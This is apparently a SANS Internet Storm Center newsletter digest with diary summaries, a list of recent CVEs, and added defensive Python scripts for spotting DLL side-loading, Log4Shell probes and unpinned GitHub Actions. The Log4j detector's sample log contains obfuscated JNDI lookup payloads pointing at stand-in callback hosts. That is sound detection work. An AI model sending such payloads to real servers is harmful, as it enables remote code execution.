Internet Storm Center Spotlight

ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html

Python Bot Delivered Through DLL Side-Loading

Published: 2025-03-18

Last Updated: 2025-03-18 09:12:46 UTC

by Xavier Mertens (Version: 1)

One of my hunting rules triggered some suspicious Python code, and, diving deeper, I found an interesting example of DLL side-loading. This technique involves placing a malicious DLL with the same name and export structure as a legitimate DLL in a location the application checks first, causing the application to load the malicious DLL instead of the intended one. This is a classic vulnerability seen for years in many software products. The attacker also implemented simple tricks to bypass classic security controls.

The malware is delivered through a ZIP archive: 'Hootsuite<.>zip'. The archive contains some files that have the Hidden protection flag ...

Read the full entry: https://isc.sans.edu/diary/Python+Bot+Delivered+Through+DLL+SideLoading/31778/
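The search-order behaviour the diary describes, as an added example that is not code from the diary or from the analysed sample: a small Python model of the loader's lookup (application directory first when SafeDllSearchMode is on, KnownDLLs always mapped from System32) that flags DLLs in an application folder which shadow a System32 DLL and are unsigned or carry the Hidden attribute. The directory listing, the partial KnownDLLs set and the signed/hidden booleans are constructed sample data; on a real Windows host the booleans would come from Get-AuthenticodeSignature and the file attributes.

```python
"""Model the Windows DLL search order and flag side-loading candidates.

Added example, not code from the ISC diary. The directory listing, the
partial KnownDLLs set and the signed/hidden booleans are constructed sample
data so the script runs on any platform.
"""
from dataclasses import dataclass

# Abbreviated search order for a DLL loaded by bare name when SafeDllSearchMode
# is on (the default on supported Windows versions): the application's own
# directory is consulted before System32, which is what side-loading abuses.
SEARCH_ORDER = ("app_dir", "system32", "windows", "cwd", "path")

# Partial KnownDLLs set (assumption: a handful of well-known entries). These
# are always mapped from System32, so a copy in app_dir is never side-loaded.
KNOWN_DLLS = {"ntdll.dll", "kernel32.dll", "user32.dll", "advapi32.dll", "ole32.dll"}


@dataclass(frozen=True)
class Dll:
    name: str
    signed_by_microsoft: bool   # Get-AuthenticodeSignature on a real host
    hidden: bool = False        # the Hidden file attribute


def resolve(name, tree):
    """Return (location, Dll) for the copy the loader would pick, or None.

    `tree` maps a search location to the list of DLLs present there.
    """
    name = name.lower()
    if name in KNOWN_DLLS:
        for dll in tree.get("system32", ()):
            if dll.name.lower() == name:
                return "system32", dll
        return None
    for location in SEARCH_ORDER:
        for dll in tree.get(location, ()):
            if dll.name.lower() == name:
                return location, dll
    return None


def sideload_candidates(tree):
    """Report app_dir DLLs that shadow a System32 DLL and look untrustworthy."""
    system_names = {d.name.lower() for d in tree.get("system32", ())}
    findings = []
    for dll in tree.get("app_dir", ()):
        name = dll.name.lower()
        if name not in system_names:
            continue                      # not shadowing anything
        resolved = resolve(name, tree)
        if resolved is None or resolved[0] != "app_dir":
            continue                      # KnownDLL: loader ignores the app_dir copy
        reasons = []
        if not dll.signed_by_microsoft:
            reasons.append("not Microsoft-signed")
        if dll.hidden:
            reasons.append("hidden attribute set")
        if reasons:
            findings.append((name, reasons))
    return findings


# Constructed sample: an application folder next to a normal System32.
SAMPLE_TREE = {
    "app_dir": [
        Dll("version.dll", signed_by_microsoft=False, hidden=True),  # shadows System32 copy
        Dll("kernel32.dll", signed_by_microsoft=False),              # KnownDLL, never picked here
        Dll("helper.dll", signed_by_microsoft=False),                # app's own DLL, no shadowing
    ],
    "system32": [
        Dll("version.dll", signed_by_microsoft=True),
        Dll("kernel32.dll", signed_by_microsoft=True),
        Dll("ntdll.dll", signed_by_microsoft=True),
    ],
}

if __name__ == "__main__":
    for name, reasons in sideload_candidates(SAMPLE_TREE):
        print(f"{name}: {', '.join(reasons)}")
```

The unsigned copy of version.dll is the only hit: kernel32.dll is a KnownDLL, so the loader maps it from System32 regardless of the copy sitting next to the executable, and helper.dll shadows nothing.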

File Hashes Analysis with Power BI from Data Stored in DShield SIEM

Published: 2025-03-12

Last Updated: 2025-03-13 00:41:51 UTC

by Guy Bruneau (Version: 1)

I previously used Power BI to analyze DShield sensor data, and this time I wanted to show how it could be used by selecting a certain type of data as a large dataset and exporting it for analysis. This time, I ran a query in Elastic Discover and exported that data in CSV format to analyze it in Power BI. The first step was to run a query in Discover and select the past 60 days with the following query ...

Next was to export that data in a CSV file (screenshot: Kibana_Export_CSV).

Next step is to import the data into Power BI for analysis. In Power BI, select Excel workbook, select all files, and open the file you exported from Kibana, followed by Load. From the interface, start building the visualization you want to analyze.

First, configure the @timestamp to split the date and time by selecting Transform data and right click on the @timestamp to Remove Duplicates to create 2 columns ...

Read the full entry: https://isc.sans.edu/diary/File+Hashes+Analysis+with+Power+BI+from+Data+Stored+in+DShield+SIEM/31764/
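The same preparation steps done in plain Python, as an added example that is not the diary's Power BI procedure: the export's @timestamp is split into separate date and time columns, hash values are validated as SHA-256 and tallied per day. The CSV is constructed sample data; the column names (@timestamp, source.ip, file.hash.sha256) and the ISO 8601 timestamp format are assumptions about the DShield sensor export, not fields taken from the diary.

```python
"""Split a Kibana CSV export's @timestamp into date and time and tally hashes.

Added example, not the Power BI steps from the diary. The CSV below is
constructed sample data; the column names and the ISO 8601 timestamp format
are assumptions about the DShield sensor export.
"""
import csv
import io
import re
from collections import Counter, defaultdict
from datetime import datetime, timezone

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")

SAMPLE_CSV = """\
@timestamp,source.ip,file.hash.sha256
2025-03-10T08:15:22.123Z,203.0.113.10,9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
2025-03-10T09:40:01.000Z,203.0.113.11,9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
2025-03-11T02:05:44.510Z,198.51.100.7,e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
2025-03-11T03:12:00.000Z,198.51.100.7,deadbeef
"""


def split_timestamp(ts):
    """Return (date, time) strings in UTC, the two columns built in Power BI."""
    dt = datetime.fromisoformat(ts.replace("Z", "+00:00")).astimezone(timezone.utc)
    return dt.strftime("%Y-%m-%d"), dt.strftime("%H:%M:%S")


def load_rows(text):
    """Parse the export and add 'date' and 'time' keys to every row."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["date"], row["time"] = split_timestamp(row["@timestamp"])
        rows.append(row)
    return rows


def hash_counts_by_day(rows):
    """{date: Counter({sha256: hits})}, skipping values that are not a SHA-256."""
    per_day = defaultdict(Counter)
    for row in rows:
        h = row["file.hash.sha256"].strip().lower()
        if SHA256_RE.match(h):
            per_day[row["date"]][h] += 1
    return dict(per_day)


def malformed_hashes(rows):
    """(date, value) for rows whose hash field is not a 64-hex SHA-256."""
    return [(r["date"], r["file.hash.sha256"]) for r in rows
            if not SHA256_RE.match(r["file.hash.sha256"].strip().lower())]


if __name__ == "__main__":
    rows = load_rows(SAMPLE_CSV)
    for day, counts in sorted(hash_counts_by_day(rows).items()):
        for h, n in counts.most_common():
            print(day, n, h)
    print("malformed:", malformed_hashes(rows))
```

Validating the hash column before counting matters with sensor data: a truncated or non-hex value silently becomes its own "file" in a pivot, so the malformed rows are reported separately rather than dropped.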

Scans for VMWare Hybrid Cloud Extension (HCX) API (Log4j - not brute forcing)

Published: 2025-03-12

Last Updated: 2025-03-12 14:42:07 UTC

by Johannes Ullrich (Version: 1)

Today, I noticed increased scans for the VMWare Hybrid Cloud Extension (HCX) "sessions" endpoint. These endpoints are sometimes associated with exploit attempts for various VMWare vulnerabilities, to determine if the system is running the extensions or to gather additional information to aid exploitation.

Initially, based on the URL, I suspected brute forcing. However, after reviewing some complete requests (see below), it turns out that these attempts are exploiting the Log4j vulnerability ...

Read the full entry: https://isc.sans.edu/diary/Scans+for+VMWare+Hybrid+Cloud+Extension+HCX+API+Log4j+not+brute+forcing/31762/
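A detection for the kind of request the diary describes, as an added example that is not code or log data from the diary: it normalizes URL encoding and the nested Log4j lookups (${lower:j}, ${::-j}, ${env:X:-j}) that scanners use to hide the literal string "jndi", then extracts the scheme and callback target. The log lines are constructed; the /hybridity/api/sessions path is assumed to be the HCX sessions endpoint referred to above.

```python
"""Detect Log4Shell-style JNDI lookups in web-server log lines, including
the obfuscated forms scanners use to slip past naive string matches.

Added example, not the requests shown in the diary. The log lines are
constructed; the /hybridity/api/sessions path is assumed to be the HCX
sessions endpoint the diary refers to.
"""
import re
from urllib.parse import unquote

# Constructed Apache-style access log; hosts are documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2025:10:01:02 +0000] "POST /hybridity/api/sessions HTTP/1.1" 401 0 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2025:10:01:03 +0000] "POST /hybridity/api/sessions HTTP/1.1" 401 0 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.5 - - [12/Mar/2025:10:01:04 +0000] "POST /hybridity/api/sessions HTTP/1.1" 401 0 "-" "${${lower:j}${upper:n}${::-d}${env:NONE:-i}:${::-l}dap://198.51.100.7:1389/Basic/Command}"
203.0.113.5 - - [12/Mar/2025:10:01:05 +0000] "GET /hybridity/api/sessions?x=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fobj%7D HTTP/1.1" 404 0 "-" "curl/8.0"
"""

# Log4j lookups commonly used to hide the literal string "jndi":
#   ${lower:J} / ${upper:j}      -> case conversion of the argument
#   ${::-j}, ${env:NOPE:-j}, ... -> any lookup falling through to its ":-" default
LOOKUP_CASE = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.I)
LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://([^}\s]+)\}", re.I)


def normalize(text, max_rounds=10):
    """Undo URL encoding and resolve nested obfuscating lookups innermost-first."""
    text = unquote(unquote(text))  # double-encoded payloads are common
    for _ in range(max_rounds):
        resolved = LOOKUP_CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text)
        resolved = LOOKUP_DEFAULT.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text


def scan(log_text):
    """Return one finding per JNDI lookup: line number, scheme and target."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for m in JNDI.finditer(normalize(line)):
            findings.append({"line": lineno, "scheme": m.group(1).lower(), "target": m.group(2)})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']}: {f['scheme']} -> {f['target']}")
```

The normalization loop is bounded and stops as soon as a pass changes nothing, so a line full of unrelated ${...} text costs at most a few regex passes; matching only after normalization is what lets lines 3 and 4 be caught even though neither contains the bytes "jndi" as logged.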

Internet Storm Center Entries


Exploit Attempts for Cisco Smart Licensing Utility CVE-2024-20439 and CVE-2024-20440 (2025.03.19)

https://isc.sans.edu/diary/Exploit+Attempts+for+Cisco+Smart+Licensing+Utility+CVE202420439+and+CVE202420440/31782/

Static Analysis of GUID Encoded Shellcode (2025.03.17)

https://isc.sans.edu/diary/Static+Analysis+of+GUID+Encoded+Shellcode/31774/

Mirai Bot now incorporating (malformed?) DrayTek Vigor Router Exploits (2025.03.16)

https://isc.sans.edu/diary/Mirai+Bot+now+incroporating+malformed+DrayTek+Vigor+Router+Exploits/31770/

Recent CVEs


The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.

CVE-2025-24813 - Apache Tomcat is vulnerable to Path Equivalence leading to Remote Code Execution and/or Information disclosure via the Default Servlet, affecting versions 11.0.0-M1 through 11.0.2, 10.1.0-M1 through 10.1.34, and 9.0.0.M1 through 9.0.98.

Product: Apache Software Foundation Apache Tomcat

CVSS Score: 0 (not yet scored)

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24813

ISC Podcast: https://isc.sans.edu/podcastdetail/9368

CVE-2025-21590 - Juniper Networks Junos OS is vulnerable to improper isolation, allowing a local attacker to compromise device integrity by injecting arbitrary code via the shell.

Product: Juniper Junos

CVSS Score: 4.4

** KEV since 2025-03-13 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-21590

ISC Podcast: https://isc.sans.edu/podcastdetail/9364

NVD References:

- https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers

- https://supportportal.juniper.net/JSA93446

CVE-2025-24983 - Use after free in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.

Product: Microsoft Windows 10 1507

CVSS Score: 7.0

** KEV since 2025-03-11 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24983

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24983

CVE-2025-24985 - Integer overflow or wraparound in Windows Fast FAT Driver allows an unauthorized attacker to execute code locally.

Product: Microsoft Windows 10 1507

CVSS Score: 7.8

** KEV since 2025-03-11 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24985

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24985

CVE-2025-24993 - Heap-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code locally.

Product: Microsoft Windows 10 1507

CVSS Score: 7.8

** KEV since 2025-03-11 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24993

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24993

CVE-2025-26633 - Improper neutralization in Microsoft Management Console allows an unauthorized attacker to bypass a security feature locally.

Product: Microsoft Windows 10 1507

CVSS Score: 7.0

** KEV since 2025-03-11 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-26633

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26633

CVE-2025-24201 - visionOS, iOS, iPadOS, macOS Sequoia, Safari were vulnerable to an out-of-bounds write issue that could allow malicious web content to break out of the sandbox.

Product: Apple Safari

CVSS Score: 8.8

** KEV since 2025-03-13 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24201

NVD References:

- https://support.apple.com/en-us/122281

- https://support.apple.com/en-us/122283

- https://support.apple.com/en-us/122284

- https://support.apple.com/en-us/122285

CVE-2025-30066 - tj-actions changed-files allows remote attackers to discover secrets by reading actions logs.

Product: tj-actions changed-files

CVSS Score: 8.6

** KEV since 2025-03-18 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-30066

NVD References:

- https://blog.gitguardian.com/compromised-tj-actions/

- https://semgrep.dev/blog/2025/popular-github-action-tj-actionschanged-files-is-compromised/

- https://sysdig.com/blog/detecting-and-mitigating-the-tj-actions-changed-files-supply-chain-attack-cve-2025-30066/

- https://web.archive.org/web/20250315060250/https://github.com/tj-actions/changed-files/issues/2463

- https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromised

- https://www.wiz.io/blog/github-action-tj-actions-changed-files-supply-chain-attack-cve-2025-30066

- https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-github-action-cve-2025-30066
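A workflow check for this class of compromise, as an added example that is not code from any of the advisories linked above: it lists every external action a workflow references, reports whether the reference is a mutable tag or branch rather than a full commit SHA, and flags any use of tj-actions/changed-files so the pinned SHA can be compared against the advisories. The workflow text is constructed, and the 40-hex SHA in it is a placeholder, not a real commit of either action.

```python
"""Audit GitHub Actions workflows for actions referenced by mutable tags.

Added example, not code from any of the advisories linked above. The
workflow text is constructed; the 40-hex commit SHA in it is a placeholder,
not a real commit of either action.
"""
import re

# Matches `uses: owner/repo[/path]@ref`; quoted forms, local ./ and docker:// uses are skipped.
USES = re.compile(r"^\s*-?\s*uses:\s*([\w.-]+/[\w.-]+(?:/[\w./-]+)?)@(\S+)", re.M)
SHA40 = re.compile(r"^[0-9a-f]{40}$")
# Action named in CVE-2025-30066: the advisories describe its version tags
# being repointed at a malicious commit that printed secrets into job logs.
COMPROMISED = {"tj-actions/changed-files"}

SAMPLE_WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Changed files
        uses: tj-actions/changed-files@v45
      - uses: actions/setup-python@0123456789abcdef0123456789abcdef01234567  # placeholder SHA
      - run: echo ok
"""


def audit_workflow(yaml_text):
    """One finding per external action reference, with pin status and compromise flag."""
    findings = []
    for m in USES.finditer(yaml_text):
        action, ref = m.group(1), m.group(2)
        repo = "/".join(action.split("/")[:2]).lower()
        findings.append({
            "action": action,
            "ref": ref,
            "pinned_to_sha": bool(SHA40.match(ref)),
            "compromised": repo in COMPROMISED,
        })
    return findings


def needs_attention(findings):
    """Entries a reviewer must act on: unpinned references, plus any use of a
    compromised action (a SHA pin still has to be checked against the advisory)."""
    return [f for f in findings if not f["pinned_to_sha"] or f["compromised"]]


if __name__ == "__main__":
    for f in needs_attention(audit_workflow(SAMPLE_WORKFLOW)):
        status = "SHA-pinned" if f["pinned_to_sha"] else "mutable ref"
        flag = " COMPROMISED ACTION" if f["compromised"] else ""
        print(f"{f['action']}@{f['ref']}: {status}{flag}")
```

A tag such as v45 is only a pointer the action's maintainer (or whoever holds their credentials) can move, which is why a tag pin gave no protection here; a full-length commit SHA is immutable, but for an action known to be compromised the SHA itself still has to be checked against the published malicious commits.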

CVE-2025-24984 - Windows NTFS allows unauthorized attackers to disclose sensitive information through log file insertion via physical attack.

Product: Microsoft Windows 10 1507

CVSS Score: 4.6

** KEV since 2025-03-11 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24984

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24984

CVE-2025-24991 - Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information locally.

Product: Microsoft Windows 10 1507

CVSS Score: 5.5

** KEV since 2025-03-11 **

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24991

NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24991

CVE-2024-56336 - SINAMICS S200 is vulnerable to injection of malicious code or installation of untrusted firmware due to an unlocked bootloader.

Product: Siemens SINAMICS S200

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-56336

NVD References: https://cert-portal.siemens.com/productcert/html/ssa-787280.html

CVE-2025-27494 - SiPass integrated AC5102 (ACC-G2) and SiPass integrated ACC-AP devices < V6.4.9 have a vulnerability that could allow a remote administrator to escalate privileges by injecting arbitrary commands.

Product: Siemens SiPass integrated AC5102

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-27494

NVD References: https://cert-portal.siemens.com/productcert/html/ssa-515903.html

CVE-2025-27363 - FreeType versions 2.13.0 and below have an out of bounds write vulnerability related to font subglyph structures, potentially leading to arbitrary code execution.

Product: FreeType

CVSS Score: 8.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-27363

ISC Podcast: https://isc.sans.edu/podcastdetail/9362

NVD References: https://www.facebook.com/security/advisories/cve-2025-27363

CVE-2025-26701 - Percona PMM Server (OVA) before version 3.0.0-1.ova allows default service account credentials to potentially lead to SSH access, use of Sudo to root, and sensitive data exposure, fixed in later versions.

Product: Percona PMM Server

CVSS Score: 10.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-26701

NVD References: https://www.percona.com/blog/security-advisory-cve-affecting-percona-monitoring-and-management-pmm/

CVE-2025-22954 - GetLateOrMissingIssues in C4/Serials.pm in Koha before 24.11.02 allows SQL Injection in /serials/lateissues-export.pl via the supplierid or serialid parameter.

Product: Koha

CVSS Score: 10.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-22954

NVD References:

- https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=38829

- https://koha-community.org/koha-24-11-02-released/

CVE-2025-1960 - WebHMI is vulnerable to unauthorized command execution due to an insecure default password and incorrect display of default usernames.

Product: Schneider Electric WebHMI

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-1960

NVD References: https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-070-03&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-070-03.pdf

CVE-2025-27407 - graphql-ruby is vulnerable to remote code execution when loading a malicious schema definition in `GraphQL::Schema.from_introspection` prior to versions 1.11.8, 1.12.25, 1.13.24, 2.0.32, 2.1.14, 2.2.17, and 2.3.21.

Product: graphql-ruby Ruby implementation of GraphQL

CVSS Score: 9.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-27407

NVD References:

- https://about.gitlab.com/releases/2025/03/12/patch-release-gitlab-17-9-2-released

- https://github.com/github-community-projects/graphql-client

- https://github.com/rmosolgo/graphql-ruby/security/advisories/GHSA-q92j-grw3-h492

CVE-2025-2263 - Sante PACS Server.exe is vulnerable to a stack-based buffer overflow during login due to a fixed-size buffer passed to the OpenSSL function EVP_DecryptUpdate.

Product: Sante International Sante PACS Server

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-2263

NVD References: https://www.tenable.com/security/research/tra-2025-08

CVE-2025-27593 - SDD Device Drivers are vulnerable to code execution on target systems due to missing download verification checks.

Product: SICK SDD Device Drivers (DL100)

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-27593

NVD References:

- https://cdn.sick.com/media/docs/1/11/411/Special_information_CYBERSECURITY_BY_SICK_en_IM0084411.PDF

- https://github.security.telekom.com/2025/03/multiple-vulnerabilities-in-sick-dl100.html

- https://sick.com/psirt

- https://www.cisa.gov/resources-tools/resources/ics-recommended-practices

- https://www.first.org/cvss/calculator/3.1

- https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0004.json

- https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0004.pdf

CVE-2025-27595 - The device's weak hashing algorithm allows attackers to easily calculate matching passwords, compromising its security and integrity.

Product: SICK DL100

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-27595

NVD References:

- https://cdn.sick.com/media/docs/1/11/411/Special_information_CYBERSECURITY_BY_SICK_en_IM0084411.PDF

- https://github.security.telekom.com/2025/03/multiple-vulnerabilities-in-sick-dl100.html

- https://sick.com/psirt

- https://www.cisa.gov/resources-tools/resources/ics-recommended-practices

- https://www.first.org/cvss/calculator/3.1

- https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0004.json

- https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0004.pdf

CVE-2025-2000 - Qiskit versions 0.18.0 through 1.4.1 are vulnerable to code execution attacks when deserialising maliciously crafted QPY files.

Product: Qiskit QPY

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-2000

NVD References: https://www.ibm.com/support/pages/node/7185949

CVE-2025-29029, CVE-2025-29030, CVE-2025-29031 - Tenda AC6 v15.03.05.16 was discovered to contain buffer overflow vulnerabilities

Product: Tenda AC6

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29029

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29030

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29031

NVD References:

- https://github.com/WhereisDoujo/CVE/issues/2

- https://github.com/WhereisDoujo/CVE/issues/3

- https://github.com/WhereisDoujo/CVE/issues/5

CVE-2025-29384, CVE-2025-29385, CVE-2025-29386 - Tenda AC9 v1.0 V15.03.05.14_multi is vulnerable to stack overflow, allowing for remote arbitrary code execution.

Product: Tenda AC9

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29384

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29385

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29386

NVD References:

- https://github.com/shuqi233/loophole/blob/main/Tenda%20AC9/AdvSetMacMtuWan1.md

- https://github.com/shuqi233/loophole/blob/main/Tenda%20AC9/AdvSetMacMtuWan3.md

- https://github.com/shuqi233/loophole/blob/main/Tenda%20AC9/AdvSetMacMtuWan4.md

CVE-2025-2345 - IROAD Dash Cam X5 and Dash Cam X6, up to 20250308, have a very critical vulnerability that allows for remote attacks due to improper authorization.

Product: IROAD Dash Cam X5

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-2345

NVD References:

- https://github.com/geo-chen/IROAD/blob/main/README.md#finding-5-managing-settings-to-obtain-sensitive-data-and-sabotaging-car-battery

- https://vuldb.com/?ctiid.299811

- https://vuldb.com/?id.299811

- https://vuldb.com/?submit.516883

CVE-2025-2395 - The U-Office Force from e-Excellence is vulnerable to Unauthorized Access due to an Improper Authentication issue that enables unauthenticated remote attackers to manipulate cookies and gain administrator access.

Product: e-Excellence U-Office Force

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-2395

NVD References:

- https://www.twcert.org.tw/en/cp-139-10012-d5bbc-2.html

- https://www.twcert.org.tw/tw/cp-132-10011-3de72-1.html

CVE-2025-25914 - Online Exam Mastering System v.1.0 is vulnerable to SQL injection, allowing remote attackers to execute arbitrary code via the fid parameter.

Product: Online Exam Mastering System v.1.0

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-25914

NVD References: https://github.com/872323857/CVE/blob/main/online-exam-mastering-system_sqlinject.md

CVE-2024-23943 - Cloud API allows unauthenticated remote attackers to gain access due to a critical function lacking authentication, without affecting availability.

Product: Cisco Cloud API

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-23943

NVD References: https://cert.vde.com/en/advisories/VDE-2024-010

CVE-2023-47539 - FortiMail version 7.4.0 with RADIUS authentication and remote_wildcard enabled allows a remote unauthenticated attacker to bypass admin login.

Product: Fortinet FortiMail

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-47539

NVD References: https://fortiguard.com/psirt/FG-IR-23-439

CVE-2024-8997 - Vestel EVC04 Configuration Interface is vulnerable to SQL Injection through 18.03.2025.

Product: Vestel EVC04 Configuration Interface

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8997

NVD References: https://www.usom.gov.tr/bildirim/tr-25-0070

CVE-2024-56346 - IBM AIX 7.2 and 7.3 nimesis NIM master service allows remote attackers to execute arbitrary commands.

Product: IBM AIX

CVSS Score: 10.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-56346

NVD References: https://www.ibm.com/support/pages/node/7186621

CVE-2024-56347 - IBM AIX 7.2 and 7.3 nimsh service is vulnerable to remote code execution due to weak SSL/TLS protection.

Product: IBM AIX

CVSS Score: 9.6

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-56347

NVD References: https://www.ibm.com/support/pages/node/7186621

CVE-2024-10441 - Synology BeeStation Manager (BSM), Synology DiskStation Manager (DSM), and Synology Unified Controller (DSMUC) are vulnerable to improper encoding or escaping of output, allowing remote attackers to execute arbitrary code.

Product: Synology BeeStation Manager (BSM)

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-10441

NVD References:

- https://www.synology.com/en-global/security/advisory/Synology_SA_24_20

- https://www.synology.com/en-global/security/advisory/Synology_SA_24_23

CVE-2024-10442 - Synology Replication Service and Synology Unified Controller (DSMUC) before specified versions allow remote attackers to execute arbitrary code due to an off-by-one error vulnerability.

Product: Synology Replication Service

CVSS Score: 10.0

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-10442

NVD References: https://www.synology.com/en-global/security/advisory/Synology_SA_24_22

CVE-2024-11131 - Synology Camera Firmware versions before 1.2.0-0525 may allow remote attackers to execute arbitrary code via unspecified vectors, affecting models BC500, CC400W, and TC500.

Product: Synology Camera Firmware

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11131

NVD References: https://www.synology.com/en-global/security/advisory/Synology_SA_24_24

CVE-2025-28915 - ThemeEgg ToolKit allows for unrestricted upload of dangerous file types, potentially enabling attackers to upload a web shell onto a web server.

Product: ThemeEgg ToolKit

Active Installations: This plugin has been closed as of February 26, 2025 and is not available for download. This closure is temporary, pending a full review.

CVSS Score: 9.1

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-28915

NVD References: https://patchstack.com/database/wordpress/plugin/themeegg-toolkit/vulnerability/wordpress-themeegg-toolkit-plugin-1-2-9-arbitrary-file-upload-vulnerability?_s_id=cve

CVE-2024-13446 - The Workreap plugin for WordPress is vulnerable to privilege escalation through account takeover due to inadequate user identity validation, allowing unauthenticated attackers to login as any user or change passwords, including administrators, up to version 3.2.5.

Product: Workreap WordPress

Active Installations: Unknown. Update to version 3.2.6, or a newer patched version

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-13446

NVD References:

- https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454

- https://www.wordfence.com/threat-intel/vulnerabilities/id/78c1308b-0849-4235-b2d6-0b1750a5614f?source=cve

CVE-2024-11284 - The WP JobHunt plugin for WordPress allows unauthenticated attackers to escalate privileges and take over accounts by changing passwords without proper validation, up to version 6.9.

Product: WordPress WP JobHunt plugin

Active Installations: Unknown. No known patch available.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11284

NVD References:

- https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636

- https://www.wordfence.com/threat-intel/vulnerabilities/id/8afe386e-1e4f-4668-8309-6d47dedb008a?source=cve

CVE-2024-11285 - The WP JobHunt plugin for WordPress up to version 7.1 is susceptible to privilege escalation through account takeover, allowing unauthenticated attackers to change users' email addresses and acquire access to their accounts.

Product: WordPress WP JobHunt plugin

Active Installations: Unknown. No known patch available.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11285

NVD References:

